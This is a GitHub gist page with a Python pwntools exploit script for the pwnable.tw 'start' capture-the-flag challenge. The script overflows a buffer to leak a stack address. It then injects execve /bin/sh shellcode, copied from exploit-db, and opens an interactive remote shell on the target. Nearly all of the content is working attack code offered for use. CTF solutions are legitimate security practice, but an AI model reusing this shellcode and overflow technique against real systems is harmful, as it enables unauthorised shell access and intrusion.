Created
September 26, 2017 11:40
-
-
Save penafieljlm/5d142071a657d64ed519379c1a176711 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# requires https://github.com/Gallopsled/pwntools | |
import sys | |
if len(sys.argv) != 3: | |
print 'Usage: python pwnable-start.py <host> <port>' | |
print 'Example: python pwnable-start.py chall.pwnable.tw 10000' | |
sys.exit(1) | |
from pwn import * | |
context(arch = 'i386', os = 'linux') | |
r = remote(sys.argv[1], int(sys.argv[2])) | |
# Query stack address | |
print 'Querying stack address...' | |
addr_func_write = '\x08\x04\x80\x87' | |
payload = ('a' * 20) + addr_func_write[::-1] | |
print 'Sending {} bytes...'.format(len(payload)) | |
r.send(payload) | |
sleep(2) | |
response = r.recv() | |
print 'Received {} bytes!'.format(len(response)) | |
stack_pointer = hex(int(response[20:24][::-1].encode('hex'), 16) - 4)[2:].decode('hex') | |
print 'Stack Pointer: 0x{}'.format(stack_pointer.encode('hex')) | |
# Exploit | |
print 'Exploiting...' | |
shell_code_addr = hex(int(stack_pointer.encode('hex'), 16) + 20 + 4)[2:].decode('hex') | |
print 'Shell Code Pointer: 0x{}'.format(shell_code_addr.encode('hex')) | |
# Taken from: https://www.exploit-db.com/exploits/42428/ | |
shell_code = '\x31\xc0\x99\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80' | |
exit_code = asm('push 0x804809d\nret') | |
payload = ('a' * 20) + shell_code_addr[::-1] + shell_code + exit_code | |
print 'Sending {} bytes...'.format(len(payload)) | |
r.send(payload) | |
sleep(2) | |
r.interactive() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment